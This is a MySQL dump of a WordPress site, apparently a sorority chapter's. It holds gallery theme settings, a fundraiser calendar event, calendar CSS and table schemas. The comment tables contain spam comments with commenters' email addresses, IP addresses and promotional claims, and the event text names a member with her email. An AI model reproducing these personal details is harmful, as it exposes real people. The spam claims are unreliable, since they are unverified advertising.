1px\",\"slideshow_filmstrip_thumb_active_border_width\":\"0\",\"slideshow_filmstrip_thumb_active_border_color\":\"FFFFFF\",\"slideshow_filmstrip_thumb_deactive_transparent\":\"80\",\"slideshow_filmstrip_rl_bg_color\":\"303030\",\"slideshow_filmstrip_rl_btn_color\":\"FFFFFF\",\"slideshow_filmstrip_rl_btn_size\":\"20\",\"slideshow_title_font_size\":\"16\",\"slideshow_title_font\":\"segoe ui\",\"slideshow_title_color\":\"FFFFFF\",\"slideshow_title_opacity\":\"70\",\"slideshow_title_border_radius\":\"5px\",\"slideshow_title_background_color\":\"000000\",\"slideshow_title_padding\":\"5px 10px 5px 10px\",\"slideshow_description_font_size\":\"14\",\"slideshow_description_font\":\"segoe ui\",\"slideshow_description_color\":\"FFFFFF\",\"slideshow_description_opacity\":\"70\",\"slideshow_description_border_radius\":\"0\",\"slideshow_description_background_color\":\"000000\",\"slideshow_description_padding\":\"5px 10px 5px 10px\",\"slideshow_dots_width\":\"10\",\"slideshow_dots_height\":\"10\",\"slideshow_dots_border_radius\":\"10px\",\"slideshow_dots_background_color\":\"292929\",\"slideshow_dots_margin\":\"1\",\"slideshow_dots_active_background_color\":\"292929\",\"slideshow_dots_active_border_width\":\"2\",\"slideshow_dots_active_border_color\":\"FFC933\",\"slideshow_play_pause_btn_size\":\"60\",\"slideshow_rl_btn_style\":\"fa-chevron\",\"blog_style_margin\":\"2px\",\"blog_style_padding\":\"4px\",\"blog_style_border_radius\":\"0\",\"blog_style_border_width\":\"1\",\"blog_style_border_style\":\"none\",\"blog_style_border_color\":\"CCCCCC\",\"blog_style_bg_color\":\"E8E8E8\",\"blog_style_box_shadow\":\"\",\"blog_style_transparent\":\"70\",\"blog_style_align\":\"center\",\"blog_style_share_buttons_bg_color\":\"FFFFFF\",\"blog_style_share_buttons_margin\":\"5px auto 10px auto\",\"blog_style_share_buttons_border_radius\":\"0\",\"blog_style_share_buttons_border_width\":\"0\",\"blog_style_share_buttons_border_style\":\"none\",\"blog_style_share_buttons_border_color\":\"000000\",\"blog_style_share_buttons_align\":\"right\",\"blog_style_img_font_size\":\"16\",\"blog_style_img_font_family\":\"segoe ui\",\"blog_style_img_font_color\":\"000000\",\"blog_style_share_buttons_color\":\"A1A1A1\",\"blog_style_share_buttons_bg_transparent\":\"0\",\"blog_style_share_buttons_font_size\":\"20\",\"image_browser_margin\":\"2px auto\",\"image_browser_padding\":\"4px\",\"image_browser_border_radius\":\"2px\",\"image_browser_border_width\":\"1\",\"image_browser_border_style\":\"none\",\"image_browser_border_color\":\"E8E8E8\",\"image_browser_bg_color\":\"E8E8E8\",\"image_browser_box_shadow\":\"\",\"image_browser_transparent\":\"80\",\"image_browser_align\":\"center\",\"image_browser_image_description_margin\":\"24px 0px 0px 0px\",\"image_browser_image_description_padding\":\"8px 8px 8px 8px\",\"image_browser_image_description_border_radius\":\"0\",\"image_browser_image_description_border_width\":\"1\",\"image_browser_image_description_border_style\":\"none\",\"image_browser_image_description_border_color\":\"FFFFFF\",\"image_browser_image_description_bg_color\":\"E8E8E8\",\"image_browser_image_description_align\":\"center\",\"image_browser_img_font_size\":\"14\",\"image_browser_img_font_family\":\"segoe ui\",\"image_browser_img_font_color\":\"000000\",\"image_browser_full_padding\":\"4px\",\"image_browser_full_border_radius\":\"0\",\"image_browser_full_border_width\":\"1\",\"image_browser_full_border_style\":\"solid\",\"image_browser_full_border_color\":\"EDEDED\",\"image_browser_full_bg_color\":\"FFFFFF\",\"image_browser_full_transparent\":\"90\",\"lightbox_info_pos\":\"top\",\"lightbox_info_align\":\"right\",\"lightbox_info_bg_color\":\"000000\",\"lightbox_info_bg_transparent\":\"70\",\"lightbox_info_border_width\":\"1\",\"lightbox_info_border_style\":\"none\",\"lightbox_info_border_color\":\"000000\",\"lightbox_info_border_radius\":\"5px\",\"lightbox_info_padding\":\"5px\",\"lightbox_info_margin\":\"15px\",\"lightbox_title_color\":\"FFFFFF\",\"lightbox_title_font_style\":\"segoe ui\",\"lightbox_title_font_weight\":\"bold\",\"lightbox_title_font_size\":\"18\",\"lightbox_description_color\":\"FFFFFF\",\"lightbox_description_font_style\":\"segoe ui\",\"lightbox_description_font_weight\":\"normal\",\"lightbox_description_font_size\":\"14\",\"lightbox_rate_pos\":\"bottom\",\"lightbox_rate_align\":\"right\",\"lightbox_rate_icon\":\"star\",\"lightbox_rate_color\":\"F9D062\",\"lightbox_rate_size\":\"20\",\"lightbox_rate_stars_count\":\"5\",\"lightbox_rate_padding\":\"15px\",\"lightbox_rate_hover_color\":\"F7B50E\",\"lightbox_hit_pos\":\"bottom\",\"lightbox_hit_align\":\"left\",\"lightbox_hit_bg_color\":\"000000\",\"lightbox_hit_bg_transparent\":\"70\",\"lightbox_hit_border_width\":\"1\",\"lightbox_hit_border_style\":\"none\",\"lightbox_hit_border_color\":\"000000\",\"lightbox_hit_border_radius\":\"5px\",\"lightbox_hit_padding\":\"5px\",\"lightbox_hit_margin\":\"0 5px\",\"lightbox_hit_color\":\"FFFFFF\",\"lightbox_hit_font_style\":\"segoe ui\",\"lightbox_hit_font_weight\":\"normal\",\"lightbox_hit_font_size\":\"14\",\"masonry_description_font_size\":\"12\",\"masonry_description_color\":\"CCCCCC\",\"masonry_description_font_style\":\"segoe ui\",\"album_masonry_back_font_color\":\"000000\",\"album_masonry_back_font_style\":\"segoe ui\",\"album_masonry_back_font_size\":\"14\",\"album_masonry_back_font_weight\":\"normal\",\"album_masonry_back_padding\":\"0\",\"album_masonry_title_font_color\":\"CCCCCC\",\"album_masonry_title_font_style\":\"segoe ui\",\"album_masonry_thumb_title_pos\":\"bottom\",\"album_masonry_title_font_size\":\"16\",\"album_masonry_title_font_weight\":\"bold\",\"album_masonry_title_margin\":\"5px\",\"album_masonry_title_shadow\":\"\",\"album_masonry_thumb_margin\":\"4\",\"album_masonry_thumb_padding\":\"4\",\"album_masonry_thumb_border_radius\":\"0\",\"album_masonry_thumb_border_width\":\"1\",\"album_masonry_thumb_border_style\":\"none\",\"album_masonry_thumb_border_color\":\"000000\",\"album_masonry_thumb_bg_color\":\"E8E8E8\",\"album_masonry_thumbs_bg_color\":\"FFFFFF\",\"album_masonry_thumb_bg_transparent\":\"100\",\"album_masonry_thumb_box_shadow\":\"\",\"album_masonry_thumb_transparent\":\"100\",\"album_masonry_thumb_align\":\"center\",\"album_masonry_thumb_hover_effect\":\"rotate\",\"album_masonry_thumb_hover_effect_value\":\"2deg\",\"album_masonry_thumb_transition\":\"1\",\"carousel_cont_bg_color\":\"000000\",\"carousel_cont_btn_transparent\":\"0\",\"carousel_close_btn_transparent\":\"100\",\"carousel_rl_btn_bg_color\":\"000000\",\"carousel_rl_btn_border_radius\":\"20px\",\"carousel_rl_btn_border_width\":\"0\",\"carousel_rl_btn_border_style\":\"none\",\"carousel_rl_btn_border_color\":\"FFFFFF\",\"carousel_rl_btn_color\":\"FFFFFF\",\"carousel_rl_btn_height\":\"40\",\"carousel_rl_btn_size\":\"20\",\"carousel_play_pause_btn_size\":\"20\",\"carousel_rl_btn_width\":\"40\",\"carousel_close_rl_btn_hover_color\":\"CCCCCC\",\"carousel_rl_btn_style\":\"fa-chevron\",\"carousel_mergin_bottom\":\"0.5\",\"carousel_font_family\":\"Arial\",\"carousel_feature_border_width\":\"2\",\"carousel_feature_border_style\":\"solid\",\"carousel_feature_border_color\":\"5D204F\",\"carousel_caption_background_color\":\"000000\",\"carousel_caption_bottom\":\"0\",\"carousel_caption_p_mergin\":\"0\",\"carousel_caption_p_pedding\":\"5\",\"carousel_caption_p_font_weight\":\"bold\",\"carousel_caption_p_font_size\":\"14\",\"carousel_caption_p_color\":\"white\",\"carousel_title_opacity\":\"100\",\"carousel_title_border_radius\":\"5px\",\"mosaic_thumb_transition\":\"1\"}');
/*!40000 ALTER TABLE `lwz_bwg_theme` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_calendar`
--

DROP TABLE IF EXISTS `lwz_calendar`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_calendar` (
  `event_id` int(11) NOT NULL AUTO_INCREMENT,
  `event_begin` date NOT NULL,
  `event_end` date NOT NULL,
  `event_title` varchar(30) COLLATE utf8_unicode_ci NOT NULL,
  `event_desc` mediumtext COLLATE utf8_unicode_ci NOT NULL,
  `event_time` time DEFAULT NULL,
  `event_recur` char(1) COLLATE utf8_unicode_ci DEFAULT NULL,
  `event_repeats` int(3) DEFAULT NULL,
  `event_author` bigint(20) unsigned DEFAULT NULL,
  `event_category` bigint(20) unsigned NOT NULL DEFAULT '1',
  `event_link` mediumtext COLLATE utf8_unicode_ci,
  PRIMARY KEY (`event_id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_calendar`
--

LOCK TABLES `lwz_calendar` WRITE;
/*!40000 ALTER TABLE `lwz_calendar` DISABLE KEYS */;
INSERT INTO `lwz_calendar` VALUES (1,'2015-11-19','2015-11-19','A Night of Comedy','Join us for a night of laughter at the Baltimore Comedy Factory. Tickets are $20 and can be purchased from your favorite LGZ Zeta or by emailing Patreece Carter at waysandmeans@zphiblgz.org. \r\n\r\nAll proceeds benefit the W. Ruth Conway Scholarship. ','14:00:00','S',0,29,3,'');
/*!40000 ALTER TABLE `lwz_calendar` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_calendar_categories`
--

DROP TABLE IF EXISTS `lwz_calendar_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_calendar_categories` (
  `category_id` int(11) NOT NULL AUTO_INCREMENT,
  `category_name` varchar(30) COLLATE utf8_unicode_ci NOT NULL,
  `category_colour` varchar(30) COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`category_id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_calendar_categories`
--

LOCK TABLES `lwz_calendar_categories` WRITE;
/*!40000 ALTER TABLE `lwz_calendar_categories` DISABLE KEYS */;
INSERT INTO `lwz_calendar_categories` VALUES (1,'General',''),(2,'Community Service','#4285f4'),(3,'Scholarship ','#f0e7e7'),(4,'Howard County Events','#213c4d');
/*!40000 ALTER TABLE `lwz_calendar_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_calendar_config`
--

DROP TABLE IF EXISTS `lwz_calendar_config`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_calendar_config` (
  `config_item` varchar(30) COLLATE utf8_unicode_ci NOT NULL,
  `config_value` mediumtext COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`config_item`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_calendar_config`
--

LOCK TABLES `lwz_calendar_config` WRITE;
/*!40000 ALTER TABLE `lwz_calendar_config` DISABLE KEYS */;
INSERT INTO `lwz_calendar_config` VALUES ('can_manage_events','manage_options'),('calendar_style','    .calnk a:hover {\r\n        background-position:0 0;\r\n        text-decoration:none;  \r\n        color:#000000;\r\n        border-bottom:1px dotted #000000;\r\n     }\r\n    .calnk a:visited {\r\n        text-decoration:none;\r\n        color:#000000;\r\n        border-bottom:1px dotted #000000;\r\n    }\r\n    .calnk a {\r\n        text-decoration:none; \r\n        color:#000000; \r\n        border-bottom:1px dotted #000000;\r\n    }\r\n    .calnk a span { \r\n        display:none; \r\n    }\r\n    .calnk a:hover span {\r\n        color:#333333; \r\n        background:#F6F79B; \r\n        display:block;\r\n        position:absolute; \r\n        margin-top:1px; \r\n        padding:5px; \r\n        width:150px; \r\n        z-index:100;\r\n        line-height:1.2em;\r\n    }\r\n    .calendar-table {\r\n        border:0 !important;\r\n        width:100% !important;\r\n        border-collapse:separate !important;\r\n        border-spacing:2px !important;\r\n    }\r\n    .calendar-heading {\r\n        height:25px;\r\n        text-align:center;\r\n        background-color:#E4EBE3;\r\n    }\r\n    .calendar-next {\r\n        width:20%;\r\n        text-align:center;\r\n        border:none;\r\n    }\r\n    .calendar-prev {\r\n        width:20%;\r\n        text-align:center;\r\n        border:none;\r\n    }\r\n    .calendar-month {\r\n        width:60%;\r\n        text-align:center;\r\n        font-weight:bold;\r\n        border:none;\r\n    }\r\n    .normal-day-heading {\r\n        text-align:center;\r\n        width:25px;\r\n        height:25px;\r\n        font-size:0.8em;\r\n        border:1px solid #DFE6DE;\r\n        background-color:#EBF2EA;\r\n    }\r\n    .weekend-heading {\r\n        text-align:center;\r\n        width:25px;\r\n        height:25px;\r\n        font-size:0.8em;\r\n        border:1px solid #DFE6DE;\r\n        background-color:#EBF2EA;\r\n        color:#FF0000;\r\n    }\r\n    .day-with-date {\r\n        vertical-align:text-top;\r\n        text-align:left;\r\n        width:60px;\r\n        height:60px;\r\n        border:1px solid #DFE6DE;\r\n    }\r\n    .no-events {\r\n\r\n    }\r\n    .day-without-date {\r\n        width:60px;\r\n        height:60px;\r\n        border:1px solid #E9F0E8;\r\n    }\r\n    span.weekend {\r\n        color:#FF0000;\r\n    }\r\n    .current-day {\r\n        vertical-align:text-top;\r\n        text-align:left;\r\n        width:60px;\r\n        height:60px;\r\n        border:1px solid #BFBFBF;\r\n        background-color:#E4EBE3;\r\n    }\r\n    span.event {\r\n        font-size:0.75em;\r\n    }\r\n    .kjo-link {\r\n        font-size:0.75em;\r\n        text-align:center;\r\n    }\r\n    .calendar-date-switcher {\r\n        height:25px;\r\n        text-align:center;\r\n        border:1px solid #D6DED5;\r\n        background-color:#E4EBE3;\r\n    }\r\n    .calendar-date-switcher form {\r\n        margin:2px;\r\n    }\r\n    .calendar-date-switcher input {\r\n        border:1px #D6DED5 solid;\r\n        margin:0;\r\n    }\r\n    .calendar-date-switcher input[type=submit] {\r\n        padding:3px 10px;\r\n    }\r\n    .calendar-date-switcher select {\r\n        border:1px #D6DED5 solid;\r\n        margin:0;\r\n    }\r\n    .calnk a:hover span span.event-title {\r\n        padding:0;\r\n        text-align:center;\r\n        font-weight:bold;\r\n        font-size:1.2em;\r\n        margin-left:0px;\r\n    }\r\n    .calnk a:hover span span.event-title-break {\r\n        width:96%;\r\n        text-align:center;\r\n        height:1px;\r\n        margin-top:5px;\r\n        margin-right:2%;\r\n        padding:0;\r\n        background-color:#000000;\r\n        margin-left:0px;\r\n    }\r\n    .calnk a:hover span span.event-content-break {\r\n        width:96%;\r\n        text-align:center;\r\n        height:1px;\r\n        margin-top:5px;\r\n        margin-right:2%;\r\n        padding:0;\r\n        background-color:#000000;\r\n        margin-left:0px;\r\n    }\r\n    .page-upcoming-events {\r\n        font-size:80%;\r\n    }\r\n    .page-todays-events {\r\n        font-size:80%;\r\n    }\r\n    .calendar-table table,tbody,tr,td {\r\n        margin:0 !important;\r\n        padding:0 !important;\r\n    }\r\n    table.calendar-table {\r\n        margin-bottom:5px !important;\r\n    }\r\n    .cat-key {\r\n        width:100%;\r\n        margin-top:30px;\r\n        padding:5px;\r\n        border:0 !important;\r\n    }\r\n    .cal-separate {\r\n       border:0 !important;\r\n       margin-top:10px;\r\n    }\r\n    table.cat-key {\r\n       margin-top:5px !important;\r\n       border:1px solid #DFE6DE !important;\r\n       border-collapse:separate !important;\r\n       border-spacing:4px !important;\r\n       margin-left:2px !important;\r\n       width:99.5% !important;\r\n       margin-bottom:5px !important;\r\n    }\r\n    .minical-day {\r\n       background-color:#F6F79B;\r\n    }\r\n    .cat-key td {\r\n       border:0 !important;\r\n    }'),('display_author','false'),('display_jump','false'),('display_todays','false'),('display_upcoming','true'),('display_upcoming_days','7'),('calendar_version','1.2'),('enable_categories','true'),('show_attribution_link','true');
/*!40000 ALTER TABLE `lwz_calendar_config` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_commentmeta`
--

DROP TABLE IF EXISTS `lwz_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=397 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_commentmeta`
--

LOCK TABLES `lwz_commentmeta` WRITE;
/*!40000 ALTER TABLE `lwz_commentmeta` DISABLE KEYS */;
INSERT INTO `lwz_commentmeta` VALUES (387,114,'akismet_result','true'),(388,114,'akismet_history','a:2:{s:4:\"time\";d:1631395721.4491970539093017578125;s:5:\"event\";s:10:\"check-spam\";}'),(389,114,'akismet_as_submitted','a:16:{s:14:\"comment_author\";s:10:\"Hairstyles\";s:20:\"comment_author_email\";s:30:\"JoesphCamburn56533@hotmail.com\";s:18:\"comment_author_url\";s:29:\"https://www.hairstylesvip.com\";s:15:\"comment_content\";s:179:\"Hi! I\'ve been reading your site for some time now and finally got the bravery to go ahead and give you a shout out from  Houston Tx! Just wanted to say keep up the excellent work!\";s:12:\"comment_type\";s:7:\"comment\";s:7:\"user_ID\";i:0;s:7:\"user_id\";i:0;s:17:\"comment_author_IP\";s:14:\"104.168.34.151\";s:13:\"comment_agent\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:7:\"user_ip\";s:14:\"104.168.34.151\";s:10:\"user_agent\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:4:\"blog\";s:20:\"https://zphiblgz.org\";s:9:\"blog_lang\";s:5:\"en_US\";s:12:\"blog_charset\";s:5:\"UTF-8\";s:9:\"permalink\";s:48:\"https://zphiblgz.org/scholarship/recommendation/\";s:10:\"POST_ak_js\";s:3:\"218\";}'),(390,115,'akismet_result','true'),(391,115,'akismet_history','a:2:{s:4:\"time\";d:1631562070.51317310333251953125;s:5:\"event\";s:10:\"check-spam\";}'),(392,115,'akismet_as_submitted','a:16:{s:14:\"comment_author\";s:8:\"Rosmunda\";s:20:\"comment_author_email\";s:22:\"info@hushbrandsinc.com\";s:18:\"comment_author_url\";s:117:\"http://jenscbdshop.mybuzzblog.com/7481545/feeling-stressed-simple-healthy-ways-you-can-achieve-relaxation-an-overview\";s:15:\"comment_content\";s:304:\"Does anyone know what happened to Dime Piece LA celebrity streetwear brand? I cannot proceed to the checkout on Dimepiecela site. I\'ve read in Harpers Bazaar that they were bought out by a UK-based hedge fund for $50 million. I\'ve just bought the Control The Guns Tee from Ebay and absolutely love it xox\";s:12:\"comment_type\";s:7:\"comment\";s:7:\"user_ID\";i:0;s:7:\"user_id\";i:0;s:17:\"comment_author_IP\";s:12:\"31.3.152.107\";s:13:\"comment_agent\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:7:\"user_ip\";s:12:\"31.3.152.107\";s:10:\"user_agent\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:4:\"blog\";s:20:\"https://zphiblgz.org\";s:9:\"blog_lang\";s:5:\"en_US\";s:12:\"blog_charset\";s:5:\"UTF-8\";s:9:\"permalink\";s:48:\"https://zphiblgz.org/scholarship/recommendation/\";s:10:\"POST_ak_js\";s:2:\"43\";}'),(396,116,'akismet_pro_tip','discard'),(393,116,'akismet_result','true'),(394,116,'akismet_history','a:2:{s:4:\"time\";d:1631984982.88362407684326171875;s:5:\"event\";s:10:\"check-spam\";}'),(395,116,'akismet_as_submitted','a:16:{s:14:\"comment_author\";s:34:\"Nutritional Products International\";s:20:\"comment_author_email\";s:23:\"mgould@nutricompany.com\";s:18:\"comment_author_url\";s:85:\"https://www.bigeasymagazine.com/2020/09/30/the-perfect-snacks-for-football-on-sunday/\";s:15:\"comment_content\";s:1318:\"By way of introduction, I am Mark Schaefer, and I represent Nutritional Products International. We serve both international and domestic manufacturers who are seeking to gain more distribution within the United States. Your brand recently caught my attention, so I am contacting you today to discuss the possibility of expanding your national distribution reach.We provide expertise in all areas of distribution, and our offerings include the following: Turnkey/One-stop solution, Active accounts with major U.S. distributors and retailers, Our executive team held executive positions with Walmart and Amazon, Our proven sales force has public relations, branding, and marketing all under one roof, We focus on both new and existing product lines, Warehousing and logistics. Our company has a proven history of initiating accounts and placing orders with major distribution outlets. Our history allows us to have intimate and unique relationships with key buyers across the United States, thus giving your brand a fast track to market in a professional manner. Please contact me directly so that we can discuss your brand further. Kind Regards, Mark Schaefer, marks@nutricompany.com, VP of Business Development, Nutritional Products International, 101 Plaza Real S, Ste #224, Boca Raton, FL 33432, Office: 561-544-0719\";s:12:\"comment_type\";s:7:\"comment\";s:7:\"user_ID\";i:0;s:7:\"user_id\";i:0;s:17:\"comment_author_IP\";s:14:\"147.78.141.191\";s:13:\"comment_agent\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:7:\"user_ip\";s:14:\"147.78.141.191\";s:10:\"user_agent\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:4:\"blog\";s:20:\"https://zphiblgz.org\";s:9:\"blog_lang\";s:5:\"en_US\";s:12:\"blog_charset\";s:5:\"UTF-8\";s:9:\"permalink\";s:48:\"https://zphiblgz.org/scholarship/recommendation/\";s:10:\"POST_ak_js\";s:2:\"82\";}');
/*!40000 ALTER TABLE `lwz_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_comments`
--

DROP TABLE IF EXISTS `lwz_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0',
  `comment_author` tinytext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `comment_author_email` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `comment_type` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10)),
  KEY `woo_idx_comment_type` (`comment_type`)
) ENGINE=MyISAM AUTO_INCREMENT=117 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_comments`
--

LOCK TABLES `lwz_comments` WRITE;
/*!40000 ALTER TABLE `lwz_comments` DISABLE KEYS */;
INSERT INTO `lwz_comments` VALUES (115,841,'Rosmunda','info@hushbrandsinc.com','http://jenscbdshop.mybuzzblog.com/7481545/feeling-stressed-simple-healthy-ways-you-can-achieve-relaxation-an-overview','31.3.152.107','2021-09-13 14:41:10','2021-09-13 19:41:10','Does anyone know what happened to Dime Piece LA celebrity streetwear brand? I cannot proceed to the checkout on Dimepiecela site. I\'ve read in Harpers Bazaar that they were bought out by a UK-based hedge fund for $50 million. I\'ve just bought the Control The Guns Tee from Ebay and absolutely love it xox',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','comment',0,0),(116,841,'Nutritional Products International','mgould@nutricompany.com','https://www.bigeasymagazine.com/2020/09/30/the-perfect-snacks-for-football-on-sunday/','147.78.141.191','2021-09-18 12:09:42','2021-09-18 17:09:42','By way of introduction, I am Mark Schaefer, and I represent Nutritional Products International. We serve both international and domestic manufacturers who are seeking to gain more distribution within the United States. Your brand recently caught my attention, so I am contacting you today to discuss the possibility of expanding your national distribution reach.We provide expertise in all areas of distribution, and our offerings include the following: Turnkey/One-stop solution, Active accounts with major U.S. distributors and retailers, Our executive team held executive positions with Walmart and Amazon, Our proven sales force has public relations, branding, and marketing all under one roof, We focus on both new and existing product lines, Warehousing and logistics. Our company has a proven history of initiating accounts and placing orders with major distribution outlets. Our history allows us to have intimate and unique relationships with key buyers across the United States, thus giving your brand a fast track to market in a professional manner. Please contact me directly so that we can discuss your brand further. Kind Regards, Mark Schaefer, marks@nutricompany.com, VP of Business Development, Nutritional Products International, 101 Plaza Real S, Ste #224, Boca Raton, FL 33432, Office: 561-544-0719',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','comment',0,0),(114,841,'Hairstyles','JoesphCamburn56533@hotmail.com','https://www.hairstylesvip.com','104.168.34.151','2021-09-11 16:28:41','2021-09-11 21:28:41','Hi! I\'ve been reading your site for some time now and finally got the bravery to go ahead and give you a shout out from  Houston Tx! Just wanted to say keep up the excellent work!',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','comment',0,0);
/*!40000 ALTER TABLE `lwz_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_duplicator_packages`
--

DROP TABLE IF EXISTS `lwz_duplicator_packages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_duplicator_packages` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(250) NOT NULL,
  `hash` varchar(50) NOT NULL,
  `status` int(11) NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `owner` varchar(60) NOT NULL,
  `package` longtext NOT NULL,
  PRIMARY KEY (`id`),
  KEY `hash` (`hash`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_duplicator_packages`
--

LOCK TABLES `lwz_duplicator_packages` WRITE;
/*!40000 ALTER TABLE `lwz_duplicator_packages` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_duplicator_packages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_formmaker`
--

DROP TABLE IF EXISTS `lwz_formmaker`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_formmaker` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(127) NOT NULL,
  `mail` varchar(128) NOT NULL,
  `form_front` longtext NOT NULL,
  `theme` int(11) NOT NULL,
  `javascript` text NOT NULL,
  `submit_text` longtext NOT NULL,
  `url` varchar(200) NOT NULL,
  `submit_text_type` tinyint(4) NOT NULL,
  `script_mail` text NOT NULL,
  `script_mail_user` text NOT NULL,
  `counter` int(11) NOT NULL,
  `published` int(11) NOT NULL DEFAULT '1',
  `label_order` text NOT NULL,
  `label_order_current` text NOT NULL,
  `article_id` varchar(500) NOT NULL,
  `pagination` varchar(128) NOT NULL,
  `show_title` varchar(128) NOT NULL,
  `show_numbers` varchar(128) NOT NULL,
  `public_key` varchar(50) NOT NULL,
  `private_key` varchar(50) NOT NULL,
  `recaptcha_theme` varchar(20) NOT NULL,
  `paypal_mode` int(2) NOT NULL,
  `checkout_mode` varchar(20) NOT NULL,
  `paypal_email` varchar(50) NOT NULL,
  `payment_currency` varchar(20) NOT NULL,
  `tax` float NOT NULL,
  `form_fields` text NOT NULL,
  `savedb` tinyint(4) NOT NULL DEFAULT '1',
  `sendemail` tinyint(4) NOT NULL DEFAULT '1',
  `requiredmark` varchar(20) NOT NULL DEFAULT '*',
  `from_mail` varchar(128) NOT NULL,
